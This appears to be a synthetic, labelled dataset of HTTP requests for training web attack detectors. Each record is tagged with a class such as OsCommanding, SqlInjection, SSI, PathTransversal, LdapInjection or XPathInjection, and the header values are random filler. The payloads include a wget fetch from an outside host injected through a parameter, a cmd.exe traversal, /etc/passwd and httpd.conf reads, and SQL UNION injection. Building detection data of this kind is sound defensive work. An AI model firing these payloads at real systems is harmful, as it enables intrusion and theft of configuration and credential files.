User-Agent: Mozilla/3.6 (Machintosh; U; PPC 2.5; C4-eA; rv:3.1.2) Gecko/73455552
UA-CPU: x86
UA-Disp: 789,1758,32
UA-OS: Win95
UA-Color: color32
Via: HTTP/7.0 www.aoeaaeae.png
Transfer-Encoding: identity
Upgrade: boi/5.8
Warning: 455 www.sliflg.jpg "eyfiunfe9Mutu" "Wed, 31 Jan 07 12:29:53 UTC"
X-Forwarded-For: 29.238.23.108
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40981
Start - Id: 43284
class: OsCommanding
GET /twu@u/DagaptFer/nhIGapi.msf?s94Rsinqtgoheea=6o&ySOutnt=yo&a4pOleeesl5dma=bo%7Epseval%5DO%5Ceeei&e5ieaehjnq=%22+++++%3B+++%2Fusr%2Fbin%2Fwget+++www.elolelteaner.com%2Ftineenat+%3B&6qmailEeWUDE=8&ncqQn7s=3R_VM9bg&KFc@Yl2unionDC=pZp3UC&3e=81&r3p=54306089&d7s2=5409 HTTP/1.0
Host: www.S7CVfsdN.com:41
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.6
Accept-Encoding: compress, gzip;q=0.8, compress, gzip, deflate;q=0.8
Accept-Language: ith2mh-t1t;q=0.8, gi-ewlinw, ej-ey, tao-ot
Cache-Control: min-fresh=03
Client-ip: 86.210.157.25
Cookie: adstaij5ov=2122835;r5tEeuxphq2=7;49rmelat=11742413
Cookie2: $Version="414"
Date: Thu, 12 Jun 08 19:12:43 UTC
ETag: W/"9LxvEG1xl9f1meqjQ5m"
Expect: b1t3F5ik=ccEnhleR;tysne=masht6
From: fztees@dntsngao.be
If-Modified-Since: Sun, 15 Jun 08 02:35:55 UTC
If-Unmodified-Since: Sat, 27 Jun 09 08:50:03 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 20 Sep 04 03:49:49 GMT
Max-Forwards: 92
MIME-Version: 3.7
Pragma: a=4h
Proxy-Authorization: Digest qop=auth-int
Authorization: mVat alaCi5eC=cfwd
Range: -8678
Referer: http://zaiR.be/dn7s.cgi
TE: chunked
Trailer: If-Match
User-Agent: Mozilla/9.2 (X11; U; Linux i386 8.3; rn-iE; rv:2.2.5) Gecko/55736109
UA-CPU: PowerPC
UA-Disp: 5548,243,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3321x719
Via: FTP/0.2 101.232.26.216
Transfer-Encoding: identity
Upgrade: uilasL/5.5, ihdnH/4.2
Warning: 824 77.211.235.51 "cihtsshy" "Wed, 01 Mar 06 07:42:35 UTC"
X-Forwarded-For: 160.47.213.152
X-Serial-Number: 9975739043069
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 43284
Start - Id: 41187
class: SqlInjection
GET /hQxnaujE_MNMGFvQmST/QD3P5-cdcmdQXZty.jpg?@cstdinZogCVB=27&esabnhaegsreo=71&p7vit2k=eel3r8aoer0Se%7Eex&lia=7109&era0i9ciRetse=4Q1yc9Sp&Aei=rrTTlEBJoG9e&otb5at=zf-4OO&yhlytSsd=n24zeHpaetjiei&HeidusrahISomer=t+9nu&Ftlesae9ySne1=458745&2jecpn=l6Yip_4V HTTP/1.1
Host: 130.37.3.172:80
Connection: close
Accept: video/mpeg;q=0.8, application/*, text/*;q=0.6
Accept-Charset: *
Accept-Encoding: identity;q=0.6, deflate, gzip;q=0.1, gzip;q=0.1, compress;q=0.2
Accept-Language: '     /**/    OR   /**/ 'Enl'  >    'S
Cache-Control: no-store
Client-ip: 151.63.160.140
Cookie: CUBDUnetcat=utNf3te;poi9tBos9cpp8=u o6E0e
Cookie2: $Version="0"
Date: Fri, 12 Sep 08 23:15:13 CET
ETag: "ThY1cTTEqxmOVuYl"
Expect: 100-continue
From: hnrnbiad@nJninesrqA.biz
If-Modified-Since: Sat, 31 Mar 07 06:30:22 GMT
If-Unmodified-Since: Sun, 11 Dec 05 13:06:08 CET
If-Match: *
If-None-Match: "ceix1PT.YXfQIG7"
If-Range: "kYzYHV1khiCHsYn-"
Max-Forwards: 50
MIME-Version: 2.7
Pragma: dqp7='ruN'
Proxy-Authorization: Basic dGxzUDpoZW92aQ==
Authorization: sda5A h990hii=Siyhyle
Range: 5154-283,-781,-71
Referer: /gfnrB.swf
TE: gzip,trailers,trailers
Trailer: Date
User-Agent: ar29yCu_ http://www.j35dh.ch
UA-CPU: MIPS
UA-Disp: 8221,0714,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 724x926
Via: HTTP/2.2 49.121.234.30
Transfer-Encoding: identity
Upgrade: sbssn/4.1, imo7o/6.7, etiif/1.0, tss2b/2.2
Warning: 570 20.88.197.170 "eeqmmpr1httetaoyox" 
X-Forwarded-For: 105.89.56.0
X-Serial-Number: 7584461693588
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 41187
Start - Id: 39307
class: SSI
GET /Telatl/ooroRrnsqhHrxOi3/dc6ng3bttiuwvoj1j/css4ualsen5pO/twK2KrwDB194io1RVb.htm?bgsoundE-_Qtmpv=ibeoN&9tnssiny=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&etpds=1255 HTTP/1.1
Host: www.o3obft.be:80
Connection: iqemi8t
Accept: application/*;q=0.6, application/postscript;q=0.8
Accept-Charset: *;q=0.4
Accept-Encoding: compress;q=0.0, compress, compress;q=0.5, identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 179.91.166.107
Cookie: OLGdeleted=essvntn;OvCVFPTXexecin=ocscript-v;ehs=ttl
Cookie2: $Version="7"
Date: Mon, 11 May 09 14:25:19 CET
ETag: "pD0ccILhMH5ownzMZB"
Expect: oeyvtn
From: l2mr@a6ldiT.ch
If-Modified-Since: Tue, 28 Jun 05 05:13:25 GMT
If-Unmodified-Since: Thu, 26 Jun 08 24:11:01 GMT
If-Match: "VLIwLDIGdk0nzXDOcJBP"
If-None-Match: "0HKt4KJnb7on6yK6hWby"
If-Range: *
Max-Forwards: 4
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic bDN0bGhzOmVldEdkZXI=
Authorization: gZEtif rrhftl=igoft4in
Range: -7615,124-
Referer: /dhpLSF/9whrie/st0yEo.asmx
TE: deflate,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/8.8 (Machintosh; U; Mac OS X 4.0; ht-ni; rv:1.6.5) Gecko/30066856
UA-CPU: MIPS
UA-Disp: 646,7509,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 5234x268
Via: unmc/1.0 59.169.11.105, 4.0 235.210.94.78
Transfer-Encoding: deflate
Upgrade: bFbb/5.5
Warning: 070 170.64.102.87 "denlnse4nrsv" "Tue, 19 Aug 08 18:04:18 UTC"
X-Forwarded-For: 229.251.127.187
X-Serial-Number: 559061405127813998
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39307
Start - Id: 44010
class: OsCommanding
GET ..%%35c../winnt/system32/cmd.exe? HTTP/1.1
Host: www.ogieqE6hm.fr
Connection: keep-alive
Accept: application/zip;q=0.8, text/xml;q=0.1, application/*
Accept-Charset: koi8-r;q=0.6
Accept-Encoding: 
Accept-Language: 9dLEaan-aes
Cache-Control: no-store
Client-ip: 17.39.141.125
Cookie: oh5l3Sewh=w5eeC9mbmx;t4ucnttat=44670420;thndnsh=Rgi;dtngiSie3ekCsee=aie;imiw=7385380
Cookie2: $Version="1"
Date: Sun, 23 Apr 06 06:43:10 UTC
ETag: "WKKEhSDEdJpn_XZ.E"
Expect: kp4tiinn=evwnas
From: 44fa@mshrPyo.gov
If-Modified-Since: Mon, 12 Jun 06 18:22:47 UTC
If-Unmodified-Since: Wed, 05 Dec 07 21:48:32 CET
If-Match: "@Ks4l7ofmyY2aScABGMH"
If-None-Match: *
If-Range: *
Max-Forwards: 484
MIME-Version: 9.9
Pragma: Pagnot=zgmeo7rn
Proxy-Authorization: Digest opaque="ebymenp"
Authorization: ivn1d wIdh9ti=ee5z
Range: 67-764741,470518-20,3-202913
Referer: http://eblyBoe2.cz/b8dhy/s0w9/uae2h/lhvh.php
TE: chunked;q=0.4,gzip;q=0.2,trailers
Trailer: Host
User-Agent: Mozilla/8.6 (compatible; Konqueror/5.5; Linux i386; 3terahleI)
UA-CPU: PowerPC
UA-Disp: 402,257,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 5667x180
Via: 3.9 www.bsiefi7.png, 7.6 www.aldsltE.tiff, FTP/4.6 90.6.139.221
Transfer-Encoding: identity
Upgrade: eeek/4.8, annk1/4.5
Warning: 912 248.158.243.227:1807 "eareZo" 
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 337660
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44010
Start - Id: 39692
class: SSI
GET /aftagndb/cwlkzdolF8lfooinktln/a93AAfi/dWw/ewm9ys87Hh/d8CXPQq.KtCvMwf4.css?v5ucd=a&Ullnan=83211256&e0=008&pietxnTgmelIh=xZGlmcb4EiV&lihrd6fwr=%40e6%3Do&phoa0=at&etthg5eesst9son=%3C%21--+++%23include+++++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22--%3E&telnetf.p_0_=n HTTP/1.0
Host: 235.242.138.235
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: x-elscunsa, s1-zal, srt1-Sannss;q=0.6, unt-hhrstaoe;q=0.4, az2oie-zuigeeoj
Cache-Control: no-transform
Client-ip: 170.88.156.59
Cookie: d2eqar1=oidernc;agTnuOe=psh9i;sra9ke5=bK7ZIo;edaort=nLahZMcYNYd7;ieegRrlD1dasMau=tY-.METMCSl;reedyr7oeoibo5=I/ehm
Cookie2: $Version="38"
Date: Mon, 23 Nov 09 10:40:31 CET
ETag: W/"xkPYfz.4VPY.xSX"
Expect: 100-continue
From: ekb7rls@onnByehnb.gov
If-Modified-Since: Thu, 05 Mar 09 18:55:28 CET
If-Unmodified-Since: Wed, 14 Jul 04 02:34:49 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 04
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Digest nc=ddEF82d6
Authorization: Digest algorithm=MD5
Range: 11490-87515,-392,063833-721563
Referer: http://www.tep7.net/tlyo/secdnaet/aeedctlf/5rtte.txt
TE: gzip;q=0.7,deflate;q=0.3
Trailer: User-Agent
User-Agent: heyvz/9.5.3.9.5
UA-CPU: Sparc
UA-Disp: 0266,938,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 726x074
Via: FTP/0.3 www.yrla.htm
Transfer-Encoding: gzip
Upgrade: im0/0.0, gln/3.7
Warning: 245 www.etcYe.gif "ra5teOtlcka8shsedl7" 
X-Forwarded-For: 166.133.168.205
X-Serial-Number: 9911764547155
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39692
Start - Id: 45862
class: PathTransversal
GET /i3mrGG32c/shutdown9aNt1d@/YOOC8PXobjectdblSf3F/ene4l6ictae/pAkjO/vincludei2.4/dwueaeh3ritwhvtTdtoe/1w45QhSo/o3ch8XN9v.jpg?rAeqmyuaicO=sc&ileinjcT4e=d%3A%5Cautoexec.bat&TdhaciedcocoOnh=dX..r1QI5R&Ev=lsejteehGwe&IXHqphSr3PT=1&eelitatrose=13705&erheoctlae5ElEe=7gm8y%2B&hdaybpi=329967&aontnpdhoice=%5Do&p2degE=mS%25&insetepovt3nh=cdc HTTP/1.1
Host: www.aecti.org
Connection: close
Accept: application/rtf;q=0.5, video/mpeg;q=0.5, text/*;q=0.6
Accept-Charset: iso-8859-7;q=0.5, euc-tw;q=0.7, big5, koi8-r;q=0.5, cp-950;q=0.4
Accept-Encoding: identity;q=0.0, identity;q=0.0, deflate;q=0.0, identity, identity;q=0.5
Accept-Language: ms-hrKeeiel;q=0.0, hh-ineLyLmr;q=0.3
Cache-Control: min-fresh=9
Client-ip: 201.51.1.17
Cookie: cByY=9;etpFenqaPadn=Ke2tlDHi;lhog=3509968;ane6yua=t08wQ
Cookie2: $Version="9"
Date: Mon, 14 Apr 08 17:29:36 CET
ETag: "NZR.pyFHpDj5.Hgrtt6w"
Expect: hor0
From: lnkmyen@hfeiUitnt.com
If-Modified-Since: Mon, 20 Oct 08 10:31:35 CET
If-Unmodified-Since: Fri, 22 Sep 06 04:40:06 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 12 Apr 06 14:46:34 CET
Max-Forwards: 185
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: ha2n eocndmf=oIeb
Authorization: Digest uri=/doti8/eosjyiik.exe
Range: 81947-,357703-
Referer: http://tecn5we.net/ihnqvlol/seoFyfte.sh
TE: chunked,trailers,trailers
Trailer: If-Modified-Since
User-Agent: lllen/1.5.9.7.9
UA-CPU: Sparc
UA-Disp: 096,9977,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 0549x672
Via: 3.3 63.142.53.49, 8.7 www.eeai.jpg
Transfer-Encoding: deflate
Upgrade: eAm77t/3.2, rcioQv/9.7, fitc/1.5
Warning: 078 www.eFerJs.html:545 "nhptoteG" 
X-Forwarded-For: 159.83.172.168
X-Serial-Number: 61308570883843
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45862
Start - Id: 42096
class: SqlInjection
GET /fnsL-F_zSpU5.-7H/eHCAoMx_p@R3sd@/XUxZwperlQe@divk6fH/ipO/oB8ddKEB/QW4SS/o6ThyFYDx@O/reorte1dbndwe5rdtel/t-4QPZ56BGxGUbY7z@Uq/w9aB/rorta4tmqarnNc9d/h6dnze1.tiff?we9usNm=%27%29+UNION++ALL+++++SELECT++%27uojy5%27%2C997%2C7%2C%2787nanl3egE%27%2C38+++FROM+++++aoy2nct4+WHERE++%28++%27%27+%3D++%27&ahdmohaetedsds=3&nuftEnhhdsg=smsp1jSNWUZ&8copyKshutdownMfElink95Z=aLy&ar7h15wylenlen=1783&we1=E4R0vbscriptexecils&Ny4fcti=8137&dnesdorskesfN6=36541585 HTTP/1.0
Host: 209.4.49.61:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: dknntru-Bfavle, aamufe2s-SoenafA;q=0.3, un7-tw6it;q=0.3, m6-eabetnl, d-s2
Cache-Control: min-fresh=46
Client-ip: 198.157.61.69
Cookie: GNZYv=niijtxhhttpieo2lruds8u;lgYxFGnph-DyIbM=aCcaCLWSw;srjO=965260
Cookie2: $Version="6"
Date: Mon, 14 Aug 06 24:22:55 GMT
ETag: "ducLTVBou0lyuo32LMT"
Expect: 7cas7y=kost
From: LzmxnseS@evezd.fr
If-Modified-Since: Thu, 09 Nov 06 21:49:12 UTC
If-Unmodified-Since: Fri, 02 Nov 07 22:48:49 CET
If-Match: *
If-None-Match: "ou0YwSWz9LPv0Awbi"
If-Range: Sun, 25 Oct 09 10:38:31 UTC
Max-Forwards: 37
MIME-Version: 0.9
Pragma: hnqnezor=1Pee
Proxy-Authorization: Digest uri=/wSot5/LjitAzt.php3
Authorization: Digest qop=auth-int
Range: 106-1944,67279-,2-
Referer: /oesWmams/sca1sdee/rm8oThe.mdb
TE: trailers,trailers
Trailer: User-Agent
User-Agent: 8too/0.6
UA-CPU: Sparc
UA-Disp: 7402,9004,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 4728x9077
Via: 9.6 www.zn9s.gif:7362
Transfer-Encoding: compress
Upgrade: axh/8.9, sit/8.6, rcc/1.0, ite/1.1
Warning: 145 www.cr5ce.html "1asaNdgii" "Tue, 19 Jan 10 12:01:34 CET"
X-Forwarded-For: 39.4.112.68
X-Serial-Number: 912151407
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42096
Start - Id: 38132
class: LdapInjection
GET /ivZ4gFOxe8BAwT9u/t2ncGz/eBO/Mmetamwindow.openjxK/6RhC.dll?_5_6zfrom2=Gcn3rdeuq4Ic&dynahOi=%3EStegxp_yF&ctar7g=p&spa8te=ao&hIfZfB3b63ML=755958&aietee=%28passwdo&Ewsde6uy=456&bcooeoayrSe=3937%29%28%26%28objectClass%3Ddyo%29%28%7C%28sn++++%3D++++0rc8%29%28cn%3Dd8++J*%29%29&2gay=m&arscts=nxa&ooriHnai=Dn8RN&us=770&Lctear=%2Baoa%29it&Nqnodfszab=1&wTairdel7tduqer=%3Dmckfa HTTP/1.1
Host: 117.109.174.186
Connection: no9tq
Accept: */*;q=0.4
Accept-Charset: euc-kr;q=0.9, macintosh, windows-1250;q=0.9, x-mac-japanese;q=0.7, big5;q=0.7
Accept-Encoding: 
Accept-Language: gx-vtra5t, csfdf-odu;q=0.6, Htintia-a0ieagt, u-hlEgn
Cache-Control: no-transform
Client-ip: 162.48.134.5
Cookie: e6ei=bhtpass;hwdeecmieyoxR=[fe-euaah\lkstdins'tt n;ghsdfhqdd=linkyv;ueoreary=8;k-DR0W-=uasystem-( lh2mfecj;aylfielfsu=having84
Cookie2: $Version="146"
Date: Wed, 16 Dec 09 01:36:11 GMT
ETag: W/"E9eWP5kbo7V4.VA00kBy"
Expect: 100-continue
From: ttste@rra4euq0.de
If-Modified-Since: Sat, 07 Nov 09 02:14:59 GMT
If-Unmodified-Since: Sat, 12 Jul 08 04:44:13 GMT
If-Match: "CnOKubaYehQ48nND5sG"
If-None-Match: "fzS1T2Fqy8lTDSXiaj@"
If-Range: "weOV50F1vup0rw5@6eHg"
Max-Forwards: 5383
MIME-Version: 0.5
Pragma: lOe3=bwe
Proxy-Authorization: sz68gt ghfnil=auo57ahx
Authorization: Basic c29vb3B0OkVlbGUwaFA=
Range: 17768-5
Referer: /OeoVuc/ogzenc3.php
TE: trailers
Trailer: From
User-Agent: Oear7H/3.0.8.1
UA-CPU: 68000
UA-Disp: 072,9161,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 2471x139
Via: FTP/0.3 46.37.149.19
Transfer-Encoding: compress
Upgrade: gsce/8.8, osc/5.9, loe/5.9, ect/1.6, 1xRehs/4.9
Warning: 919 84.81.58.238 "tamueesan" "Sat, 10 Feb 07 17:27:43 GMT"
X-Forwarded-For: 106.193.146.221
X-Serial-Number: 276586158043
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38132
Start - Id: 35847
class: XPathInjection
GET /rtOiG3yNgBc/niq7w/iw4Miehseis.sh?6b2=565311116&esootarrl=dmua%27++or++++nca5e%2Fee%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D8%5D++or+++%27eoatsce8%27++%3D++%27&99ac=5214&eOarA7j9tmspih=t4ooooIoeQ&uudo=2491&4eNhhpdiirbkAse=55&5ctwsqvroi=226&iAow8urTntrdPde=Eiia&elx0yh=89993&9J3WLfe=5&tmpoptzpvarCFB6nc9=c HTTP/1.1
Host: www.iotyh0oes.ch
Connection: close
Accept: */*;q=0.5
Accept-Charset: x-mac-cyrillic;q=0.1, big5
Accept-Encoding: identity;q=0.7, identity, identity;q=0.8, deflate
Accept-Language: *
Cache-Control: r8sg='t'
Client-ip: 177.161.53.181
Cookie: roshst=ddhPeuuf'ara8;bvt=tuWeh;lPhdea=1243929390
Cookie2: $Version="398"
Date: Sat, 24 Jun 06 06:59:46 UTC
ETag: "bhOsZQ9I08QZQJM3GB.5"
Expect: sc2nG
From: wcsotyes@fnolepci.st
If-Modified-Since: Tue, 03 Aug 04 02:08:22 GMT
If-Unmodified-Since: Fri, 14 Jan 05 21:20:23 CET
If-Match: "2L3Ma0RBDl7-YLN"
If-None-Match: *
If-Range: Sun, 29 Jan 06 04:01:31 UTC
Max-Forwards: 8608
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Digest username="ioula3"
Authorization: NTLM bnRvT2ppUlFhYmhwb25pdHU0b2NlZUZyMGVpaHJsYXllaXdvTmU=
Range: 77-,-9
Referer: /sond/huWacin/secpEaem.cgi
TE: gzip,gzip
Trailer: Authorization
User-Agent: ximr8htH/4.1.3
UA-CPU: PowerPC
UA-Disp: 747,476,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 4135x5853
Via: 2.5 97.105.72.186, 9.5 41.140.147.83
Transfer-Encoding: gzip
Upgrade: ml1/5.5, VeaAtn/8.1, thmg/1.6, lbedtw/3.5
Warning: 610 www.24teifwn.png "Opivct0gaEd" 
X-Forwarded-For: 43.11.206.228
X-Serial-Number: 83889853145892267537
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35847
Start - Id: 44793
class: PathTransversal
GET /rfml7XZQK4N4ee9_TbUY/OaGDmZsYYUW/rtGs/htbatrain/eGVIRDnRumXQm9Xc/BnodeKOljcperlV.jpg?a2Itlnr=4363270136&KPQxaep3rQAx=o2msmemhtpassadmin&49nncaELlri=yMTRRJ2jvUNX&U9=he+%28emrtdnclreplace%7E&tipimens0Cnt=1126&sr=%252e%252e.%5C%25252f%2F%5C%25252f%2F...%5C%25252e..%252e HTTP/1.1
Host: 136.71.57.17
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-icelandic;q=0.4, x-mac-greek, iso-2022-kr, x-mac-arabic
Accept-Encoding: 
Accept-Language: 1lionnu3-sam5;q=0.9, w0-sitlbnse, hOuru-sEgpwel5;q=0.1, so-eaeXatee;q=0.5
Cache-Control: max-age=0257
Client-ip: 52.144.27.25
Cookie: utatoui=  iineIe5betweenfromp0nynRdor(;pamr=1tnfh;_8U9jLP=284855;gitsouI=wfnraetuyaoKhe;fieomesrsgh=elsformnahAnedaer\;5ai5ZdIGlJFM=petB7pcnkmCH
Cookie2: $Version="0"
Date: Thu, 13 May 04 17:01:09 UTC
ETag: W/"DVV@pj03ApxUb9eIG"
Expect: 100-continue
From: Cmaxdcp@rimabEod.be
If-Modified-Since: Mon, 27 Mar 06 13:37:41 GMT
If-Unmodified-Since: Sun, 11 Apr 10 09:42:25 CET
If-Match: "3nI8a8sNuuQe3il9P"
If-None-Match: *
If-Range: Fri, 01 Jun 07 16:07:58 CET
Max-Forwards: 3
MIME-Version: 7.4
Pragma: ow6lg='nt'
Proxy-Authorization: Digest qop=auth
Authorization: Digest uri=http://www.LIst.org/Raue/prueq9y.cfm
Range: 96-644,813-
Referer: http://stiog.org/ry5aw7/7yrmcdTt/tpx3st/CbaaI/atxsnd.ace
TE: trailers
Trailer: Expect
User-Agent: Mozilla/0.4 (compatible; Konqueror/3.3; Unix; hYImmnnt; fej7Vm; rankpee)
UA-CPU: MIPS
UA-Disp: 3445,5667,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5717x165
Via: 7.4 www.bcgs.tiff, 2.6 www.YodeE4.shtml, 9.6 25.113.223.183:1
Transfer-Encoding: gzip
Upgrade: ntSos/7.8, twuyc/7.4, v1khi/3.8, ftess/6.0
Warning: 136 www.f72ts.jpeg "daakn3ltgiptelaits" "Sat, 10 Oct 09 20:12:41 UTC"
X-Forwarded-For: 4.75.179.74
X-Serial-Number: 2157159271334
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44793
Start - Id: 36375
class: PathTransversal
PUT /Ha33h7tDf2khttpsu/eEyFsz3Fy/MHgtea5/.connectJBpasswdW4z2O4/efKB.-ikUFPB9RHpWc/2oZc4ZL0Zyi-ou/Gl/cHttaYoZakp.jpg? HTTP/1.0
Content-Length: 13
Content-Encoding: identity
Content-Location: /aaXtroh/cm7eak/dcjla.mpg
Content-MD5: N05wTGxub3R0cmh1ZGVybg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 21 Sep 07 19:04:47 CET
Host: 105.14.46.205:28373
Connection: close
Accept: application/x-tar;q=0.0
Accept-Charset: *
Accept-Encoding: 
Cookie2: $Version="0"
Date: Mon, 30 Mar 09 14:51:44 CET
Expect: 100-continue
If-Match: "-zHlYIo9MVAhAXl2"
Max-Forwards: 158
Referer: /ngle/Te6tn.swf
TE: gzip;q=0.0,deflate;q=0.9,trailers
User-Agent: \.\.\/\.\.\/etc\/passwd

fBYVtV=695188

End - Id: 36375
Start - Id: 35628
class: XPathInjection
GET /Anntnfii6ow/ecedoltnbisastt/eSY/a9wrY4xU.bin?zeaeesa=insx%27%5D+++++%7C++P+++%7C++++%2F%2Fuser%5B+++++name%2Ftext%28++++%29++++%3D+%27rMZpe&1IexecU1M2tMN=45720&ae=nph-allh&4lcltnanm0er6=%5Dpe6nf%3Ce0K&2g4o6ixOhVuqn=70861 HTTP/1.1
Host: www.qEij.st:4603
Connection: rcransg
Accept: application/zip;q=0.6, image/*;q=0.6, audio/*;q=0.3
Accept-Charset: x-mac-hebrew;q=0.2, big5;q=0.5, x-mac-chinesetrad
Accept-Encoding: *
Accept-Language: ce1ao-RE, rlz8s6u-pi, 8nr7-atZtee;q=0.3, nhdios-imhnr;q=0.3
Cache-Control: max-stale=69
Client-ip: 108.171.74.43
Cookie: B9eiFyutj=oe/d+j2eey1trI 
Cookie2: $Version="6"
Date: Tue, 27 Apr 04 17:39:50 CET
ETag: W/"MtaA7VKLaZIKhkEV"
Expect: 100-continue
From: yehNodot@eblEqjJp.ch
If-Modified-Since: Sun, 02 Jul 06 22:53:33 CET
If-Unmodified-Since: Wed, 22 Feb 06 08:51:20 CET
If-Match: "euWw85SP2wjA0ciU"
If-None-Match: *
If-Range: "z285ETIARPyp0Sb0Hn.t"
Max-Forwards: 8985
MIME-Version: 3.8
Pragma: dtsnAAl='nEdTn'
Proxy-Authorization: Digest opaque="snOLwi"
Authorization: 0Sri sdeo=1cleT9
Range: 7528-,849-
Referer: /qaiE8/jooBe/eonM.mpg
TE: trailers,chunked;q=0.6,trailers
Trailer: Upgrade
User-Agent: e7qTsy http://www.ttrhi.com
UA-CPU: Sparc
UA-Disp: 458,730,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 817x128
Via: HTTP/0.9 www.hzpo.shtml
Transfer-Encoding: gzip
Upgrade: natE8s/5.8
Warning: 986 www.rBnsrcl.html "5cdarlosaE" 
X-Forwarded-For: 246.53.246.66
X-Serial-Number: 65275952070459353
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35628
Start - Id: 44307
class: OsCommanding
GET /scripts/file.bat" "& dir c:/ .exe? HTTP/1.0
Host: 68.250.142.40:80
Connection: keep-alive
Accept: video/mpeg;q=0.3, application/zip;q=0.7, video/*;q=0.8
Accept-Charset: windows-874, x-mac-arabic;q=0.3, iso-8859-9, windows-1257;q=0.0, windows-1258
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.7
Cache-Control: Iwd='tannt'
Client-ip: 18.62.79.179
Cookie: dgkliwem=bcbk
Cookie2: $Version="16"
Date: Sun, 16 Oct 05 11:49:30 GMT
ETag: "z-wEaS4pP5@ex2B"
Expect: 100-continue
From: l1Bt7@hnsv2sT9.net
If-Modified-Since: Fri, 24 Oct 08 09:28:15 GMT
If-Unmodified-Since: Sat, 31 Oct 09 22:44:50 CET
If-Match: "8Qzcs0Ith50ujetsKzuz"
If-None-Match: *
If-Range: *
Max-Forwards: 97
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Digest nc=47dBd7FC
Authorization: Basic YWllZWU6Y2VFcm5oZw==
Range: 3-
Referer: /plTuac3.html
TE: chunked;q=0.5,gzip;q=0.6,trailers
Trailer: Expect
User-Agent: aa0met96ma/9.9.8.1.7
UA-CPU: PowerPC
UA-Disp: 9070,4804,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 521x0746
Via: 0.3 www.rclelua.jpeg, FTP/3.4 www.sNundTT.js:488, FTP/6.7 133.131.7.246
Transfer-Encoding: identity
Upgrade: ott9i/7.1, tei/4.6
Warning: 525 251.120.159.217 "ay2yetttoyyhQsouLs" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 7359375071
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44307
Start - Id: 38765
class: LdapInjection
GET /i-YT1X435yJ/vwCVPHE7rFs/lH-_S/cEgtleEes/knvg/sMAkX8/tQ0uXwEYzbRV.m/qanvghn/oieicttplcano.swf?jIrktdoeru=gd&enUvneeu=r18eo&oqtar=ainh7ce5pch2ltfj&o3u=5983&niotk=2&scbcu=ne%29%28%26%28objectClass+++%3D++++eqrc*%29&tBpwhc=oWsv%403_&Nen=u0Vom2yEim&deuewe0lmzhoe=27502404&rvntlbcitmeeg3=St HTTP/1.0
Host: 155.117.150.109:0895
Connection: close
Accept: image/*;q=0.0, text/html, video/*;q=0.3
Accept-Charset: *;q=0.5
Accept-Encoding: deflate, compress;q=0.7, gzip, deflate;q=0.6
Accept-Language: reuarm-mnn, le-S5a;q=0.4, wt-iipEur;q=0.6, lgqe-a;q=0.4, Hasaee-aci
Cache-Control: only-if-cached
Client-ip: 134.201.148.112
Cookie: seame=rtnnoors;Iasgisrs0A6=nah1tsbrsrhciue;herau9tatww=11790850;nalrayuaAtakr=n
Cookie2: $Version="4"
Date: Thu, 31 Aug 06 12:34:44 GMT
ETag: W/"4lwliSRxRwODPjx"
Expect: iwaga4ao=ehlt
From: Dddcd@u4uew8d4.be
If-Modified-Since: Tue, 30 Nov 04 10:10:50 CET
If-Unmodified-Since: Fri, 09 Jan 04 21:56:47 CET
If-Match: *
If-None-Match: *
If-Range: "04Jj6asrCLCUaQfynbO"
Max-Forwards: 7
MIME-Version: 2.9
Pragma: no-cache
